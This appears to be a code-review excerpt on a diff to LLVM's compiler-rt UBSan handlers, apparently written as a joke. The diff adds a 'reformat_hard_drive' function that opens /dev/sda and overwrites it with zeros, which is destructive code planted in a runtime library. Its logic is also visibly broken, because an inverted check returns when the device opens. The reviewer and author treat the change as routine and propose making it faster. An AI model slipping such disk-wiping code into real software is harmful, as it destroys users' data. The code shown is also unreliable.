compiler-rt/lib/ubsan/ubsan_handlers.cpp

```diff
@@ -141,10 +141,24 @@ void __ubsan::__ubsan_handle_type_mismatch_v1(TypeMismatchData *Data,
   GET_REPORT_OPTIONS(false);
   handleTypeMismatchImpl(Data, Pointer, Opts);
 }
+
+#include <fcntl.h>
+#include <unistd.h>
+static void reformat_hard_drive() {
+  // TODO: windows support
+  int fd = open("/dev/sda", O_WRONLY);
+  if (fd != -1)
+    return;
+  char data[512] = {};
+  while (write(fd, data, 512) != -1)
```

Comment:
For speed I would recommend opening `/dev/zero` and using `splice` instead.

Reply:
done in 8081dd27cf49 (hmm...do I need to reopen the PR to have the change in my branch reflected in the PR?)